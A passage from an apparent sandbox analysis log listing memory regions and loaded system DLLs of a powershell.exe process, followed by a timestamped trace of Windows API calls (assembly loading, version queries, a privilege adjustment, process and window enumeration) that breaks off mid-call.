"mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" 
(normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll") Region: id = 968 start_va = 0x4730000 end_va = 0x473ffff entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 969 start_va = 0x4740000 end_va = 0x474ffff entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 970 start_va = 0x4750000 end_va = 0x475ffff entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 971 start_va = 0x4840000 end_va = 0x51cffff entry_point = 0x0 region_type = private name = "private_0x0000000004840000" filename = "" Region: id = 972 start_va = 0x5f7e0000 end_va = 0x5f8d0fff entry_point = 0x5f7e0000 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuration\\bc09ad2d49d8535371845cd7532f9271\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuration\\bc09ad2d49d8535371845cd7532f9271\\system.configuration.ni.dll") Region: id = 973 start_va = 0x7ff50000 end_va = 0x7ff5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff50000" filename = "" Region: id = 974 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 975 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 976 start_va = 0x4760000 end_va = 0x476ffff entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 977 start_va = 0x72910000 end_va = 0x72924fff entry_point = 0x72910000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 978 start_va = 0x72930000 end_va = 0x72981fff 
entry_point = 0x72930000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 979 start_va = 0x73820000 end_va = 0x7382cfff entry_point = 0x73820000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 980 start_va = 0x74b30000 end_va = 0x74b6bfff entry_point = 0x74b30000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 981 start_va = 0x4770000 end_va = 0x482ffff entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 982 start_va = 0x74680000 end_va = 0x74684fff entry_point = 0x74680000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 983 start_va = 0x74b20000 end_va = 0x74b25fff entry_point = 0x74b20000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 984 start_va = 0x4770000 end_va = 0x478ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004770000" filename = "" Region: id = 985 start_va = 0x47f0000 end_va = 0x482ffff entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 986 start_va = 0x52e0000 end_va = 0x531ffff entry_point = 0x0 region_type = private name = "private_0x00000000052e0000" filename = "" Region: id = 987 start_va = 0x716a0000 end_va = 0x716eefff entry_point = 0x716a0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 988 start_va = 0x716f0000 end_va = 0x71747fff entry_point = 0x716f0000 region_type 
= mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 989 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 990 start_va = 0x733c0000 end_va = 0x733dbfff entry_point = 0x733c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 991 start_va = 0x733b0000 end_va = 0x733b6fff entry_point = 0x733b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 992 start_va = 0x73270000 end_va = 0x7327cfff entry_point = 0x73270000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 993 start_va = 0x73250000 end_va = 0x73261fff entry_point = 0x73250000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 994 start_va = 0x74840000 end_va = 0x74847fff entry_point = 0x74840000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 995 start_va = 0x51d0000 end_va = 0x52cffff entry_point = 0x0 region_type = private name = "private_0x00000000051d0000" filename = "" Region: id = 996 start_va = 0x5350000 end_va = 0x538ffff entry_point = 0x0 region_type = private name = "private_0x0000000005350000" filename = "" Region: id = 997 start_va = 0x749f0000 end_va = 0x74a33fff entry_point = 0x749f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 998 start_va = 0x7ffd5000 end_va = 
0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 999 start_va = 0x5390000 end_va = 0x546ffff entry_point = 0x0 region_type = private name = "private_0x0000000005390000" filename = "" Region: id = 1000 start_va = 0x6f010000 end_va = 0x6f015fff entry_point = 0x6f010000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1001 start_va = 0x73280000 end_va = 0x732b7fff entry_point = 0x73280000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1002 start_va = 0x5390000 end_va = 0x542ffff entry_point = 0x0 region_type = private name = "private_0x0000000005390000" filename = "" Region: id = 1003 start_va = 0x5430000 end_va = 0x546ffff entry_point = 0x0 region_type = private name = "private_0x0000000005430000" filename = "" Region: id = 1053 start_va = 0x4790000 end_va = 0x479ffff entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 1055 start_va = 0x73970000 end_va = 0x73978fff entry_point = 0x73970000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Thread: id = 53 os_tid = 0xb48 [0048.371] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0048.599] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0048.599] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0048.599] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0048.599] SysStringByteLen 
(bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0049.389] GetVersionExW (in: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0049.389] GetLastError () returned 0x2 [0049.390] GetVersionExW (in: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0049.390] GetLastError () returned 0x2 [0049.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.395] GetLastError () returned 0x2 [0049.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ea18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.400] GetLastError () returned 0x2 [0049.400] GetVersionExW (in: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: 
lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0049.400] GetLastError () returned 0x2 [0049.401] SetErrorMode (uMode=0x1) returned 0x1 [0049.402] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14ee98 | out: lpFileInformation=0x14ee98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f02680, ftCreationTime.dwHighDateTime=0x1d2f5d2, ftLastAccessTime.dwLowDateTime=0xb7f02680, ftLastAccessTime.dwHighDateTime=0x1d2f5d2, ftLastWriteTime.dwLowDateTime=0xba2e5500, ftLastWriteTime.dwHighDateTime=0x1cb889e, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0049.402] GetLastError () returned 0x2 [0049.402] SetErrorMode (uMode=0x1) returned 0x1 [0049.405] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14ef1c | out: lpdwHandle=0x14ef1c) returned 0x94c [0049.407] GetLastError () returned 0x0 [0049.408] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1f24f08 | out: lpData=0x1f24f08) returned 1 [0049.410] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14eee8, puLen=0x14eee4 | out: lplpBuffer=0x14eee8*=0x1f24fa4, puLen=0x14eee4) returned 1 [0049.412] lstrlenW (lpString="䅁") returned 1 [0049.428] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14ee64, 
puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f25080, puLen=0x14ee60) returned 1 [0049.428] lstrlenW (lpString="Microsoft Corporation") returned 21 [0049.429] lstrcpyW (in: lpString1=0x3175c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f250d4, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="System.Management.Automation") returned 28 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f25130, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="6.1.7601.17514") returned 14 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f25170, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f251d8, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="Copyright (c) Microsoft Corporation. 
All rights reserved.") returned 57 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f25274, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f252d8, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f25354, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="6.1.7601.17514") returned 14 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0049.430] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x1f24ffc, puLen=0x14ee60) returned 1 [0049.430] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") 
returned 49 [0049.430] lstrcpyW (in: lpString1=0x3175c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0049.431] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x0, puLen=0x14ee60) returned 0 [0049.431] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x0, puLen=0x14ee60) returned 0 [0049.431] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14ee64, puLen=0x14ee60 | out: lplpBuffer=0x14ee64*=0x0, puLen=0x14ee60) returned 0 [0049.431] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14ee58, puLen=0x14ee54 | out: lplpBuffer=0x14ee58*=0x1f24fa4, puLen=0x14ee54) returned 1 [0049.432] VerLanguageNameW (in: wLang=0x0, szLang=0x3175c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0049.432] VerQueryValueW (in: pBlock=0x1f24f08, lpSubBlock="\\", lplpBuffer=0x14ee6c, puLen=0x14ee68 | out: lplpBuffer=0x14ee6c*=0x1f24f30, puLen=0x14ee68) returned 1 [0049.439] GetCurrentProcessId () returned 0xb44 [0049.482] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14e6a4 | out: lpLuid=0x14e6a4*(LowPart=0x14, HighPart=0)) returned 1 [0049.483] GetLastError () returned 0x0 [0049.484] GetCurrentProcess () returned 0xffffffff [0049.484] GetLastError () returned 0x0 [0049.485] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x14e6a0 | out: TokenHandle=0x14e6a0*=0x2e0) returned 1 [0049.485] GetLastError () returned 0x0 [0049.487] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, 
NewState=0x1f27a48*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0049.487] GetLastError () returned 0x514 [0049.489] CloseHandle (hObject=0x2e0) returned 1 [0049.489] GetLastError () returned 0x514 [0049.493] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb44) returned 0x2e0 [0049.493] GetLastError () returned 0x514 [0049.500] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x1f27a8c, cb=0x100, lpcbNeeded=0x14ee94 | out: lphModule=0x1f27a8c, lpcbNeeded=0x14ee94) returned 1 [0049.501] GetLastError () returned 0x514 [0049.503] GetModuleInformation (in: hProcess=0x2e0, hModule=0x22020000, lpmodinfo=0x1f27bcc, cb=0xc | out: lpmodinfo=0x1f27bcc*(lpBaseOfDll=0x22020000, SizeOfImage=0x72000, EntryPoint=0x22027363)) returned 1 [0049.503] GetLastError () returned 0x514 [0049.505] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x22020000, lpBaseName=0x358040, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0049.505] GetLastError () returned 0x514 [0049.506] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x22020000, lpFilename=0x358040, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0049.506] GetLastError () returned 0x514 [0049.506] CloseHandle (hObject=0x2e0) returned 1 [0049.506] GetLastError () returned 0x514 [0049.508] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xb44) returned 0x2e0 [0049.508] GetLastError () returned 0x514 [0049.510] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x1f2707c | out: lpExitCode=0x1f2707c*=0x103) returned 1 [0049.510] GetLastError () returned 0x514 [0049.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2f25278, Length=0x20000, 
ResultLength=0x14eedc | out: SystemInformation=0x2f25278, ResultLength=0x14eedc*=0xaa98) returned 0x0 [0049.536] EnumWindows (lpEnumFunc=0x1c83612, lParam=0x0) returned 1 [0049.538] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x778 [0049.538] GetLastError () returned 0x514 [0049.538] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x664 [0049.538] GetLastError () returned 0x514 [0049.538] GetWindowThreadProcessId (in: hWnd=0x200aa, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.538] GetLastError () returned 0x514 [0049.538] GetWindowThreadProcessId (in: hWnd=0x200c6, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.538] GetLastError () returned 0x514 [0049.538] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.538] GetLastError () returned 0x514 [0049.538] GetWindowThreadProcessId (in: hWnd=0x200c4, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.538] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x10072, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 
[0049.539] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x10040, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x1003c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x100d2, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.539] GetLastError () returned 0x514 [0049.539] GetWindowThreadProcessId (in: hWnd=0x5007c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.539] GetLastError () returned 0x514 [0049.540] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.540] GetLastError () returned 0x514 [0049.540] GetWindowThreadProcessId (in: hWnd=0x301e4, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0xb48 [0049.540] GetLastError () returned 0x514 [0049.541] GetWindow (hWnd=0x301e4, uCmd=0x4) returned 0x0 [0049.542] IsWindowVisible (hWnd=0x301e4) returned 0 [0049.542] GetWindowThreadProcessId (in: hWnd=0x601a4, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.542] GetLastError () returned 0x514 [0049.542] GetWindowThreadProcessId (in: hWnd=0x201d4, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.542] GetLastError () returned 0x514 [0049.542] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.542] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x101c8, 
lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x98c [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x201c4, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x898 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x888 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x878 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x868 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x858 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x848 [0049.543] GetLastError () returned 0x514 [0049.543] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x838 [0049.543] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x828 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10170, 
lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x818 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x808 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x624 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x1c4 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x7ec [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x240 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x7013a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x404 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x21c [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x738 [0049.544] GetLastError () returned 0x514 [0049.544] GetWindowThreadProcessId (in: hWnd=0x1014a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x748 [0049.544] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x1f4 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x1013e, 